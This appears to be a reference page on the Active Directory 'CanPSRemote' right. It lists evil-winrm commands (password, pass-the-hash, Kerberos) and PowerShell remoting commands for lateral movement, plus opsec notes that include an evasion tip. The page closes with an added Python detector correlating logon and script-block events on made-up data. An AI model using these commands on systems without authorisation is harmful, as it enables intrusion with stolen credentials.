CanPSRemote
Principal has the right to use PowerShell Remoting (WinRM) to the target computer.
Applies to: User/Group → Computer
Linux Abuse
evil-winrm (password)
evil-winrm -i <target> -u <username> -p '<password>' -d <domain>
evil-winrm (pass-the-hash)
evil-winrm -i <target> -u <username> -H <ntlm-hash>
evil-winrm (Kerberos)
KRB5CCNAME=<ccache> evil-winrm -i <target> -r <domain>
evil-winrm (SSL)
evil-winrm -i <target> -u <username> -p '<password>' -S
Windows Abuse
Enter-PSSession (interactive)
$cred = Get-Credential
Enter-PSSession -ComputerName <target> -Credential $cred
Invoke-Command (non-interactive)
$cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', (ConvertTo-SecureString '<password>' -AsPlainText -Force))
Invoke-Command -ComputerName <target> -Credential $cred -ScriptBlock { whoami; hostname }
New-PSSession (persistent)
$session = New-PSSession -ComputerName <target> -Credential $cred
Invoke-Command -Session $session -ScriptBlock { whoami }
Enter-PSSession -Session $session
Opsec
- WinRM uses ports 5985 (HTTP) and 5986 (HTTPS)
- Generates Event ID 4624 (logon type 3) and PowerShell script block logging (4104) if enabled
- evil-winrm uploads to %TEMP% by default; use -t to change the temp path
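Detection logic for the artifacts this list names, as an added example that is not from the original page: it correlates constructed 4624 (logon type 3) and 4104 records by host and account, and the host names, accounts and addresses are made up.

```python
"""Correlate the two host artifacts listed under Opsec: a Security 4624 with
LogonType 3 followed shortly by a PowerShell 4104 script block for the same
host and account. Added example, not from the original page; event records
are constructed samples in a simplified dict shape, not real EVTX fields."""
from datetime import datetime, timedelta

NETWORK_LOGON = 3  # WinRM logons show up as 4624 logon type 3


def find_remote_powershell(events, window=timedelta(minutes=5)):
    """Return one finding per 4104 that follows a network logon for the same
    (host, user) within `window`. A 4104 with no prior network logon (local
    console use) and a network logon with no script blocks (e.g. SMB) are
    not flagged. A long-lived New-PSSession keeps emitting 4104s after its
    4624, so widen `window` or key on session lifetime in production."""
    recent = {}  # (host, user) -> most recent network 4624
    findings = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["id"] == 4624 and e.get("logon_type") == NETWORK_LOGON:
            recent[(e["host"], e["user"])] = e
        elif e["id"] == 4104:
            logon = recent.get((e["host"], e["user"]))
            if logon is None:
                continue
            age = datetime.fromisoformat(e["ts"]) - datetime.fromisoformat(logon["ts"])
            if age <= window:
                findings.append({"host": e["host"], "user": e["user"],
                                 "src_ip": logon["src_ip"], "script": e["script"]})
    return findings


# Constructed sample timeline (hypothetical hosts, accounts and addresses).
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:00", "host": "SRV01", "id": 4624, "logon_type": 3,
     "user": "CORP\\jdoe", "src_ip": "10.0.0.5"},
    {"ts": "2024-05-01T10:00:02", "host": "SRV01", "id": 4104,
     "user": "CORP\\jdoe", "script": "whoami; hostname"},
    {"ts": "2024-05-01T10:00:03", "host": "SRV01", "id": 4104,
     "user": "CORP\\jdoe", "script": "Get-Process"},
    # network logon with no script blocks (e.g. a file share): not flagged
    {"ts": "2024-05-01T10:05:00", "host": "SRV01", "id": 4624, "logon_type": 3,
     "user": "CORP\\svc_backup", "src_ip": "10.0.0.9"},
    # script block with no preceding network logon (local console): not flagged
    {"ts": "2024-05-01T10:07:00", "host": "SRV02", "id": 4104,
     "user": "CORP\\admin", "script": "Get-Service"},
    # same account much later: outside the window, not flagged
    {"ts": "2024-05-01T11:00:00", "host": "SRV01", "id": 4104,
     "user": "CORP\\jdoe", "script": "Get-ChildItem C:\\"},
]

if __name__ == "__main__":
    for finding in find_remote_powershell(SAMPLE_EVENTS):
        print(finding)
```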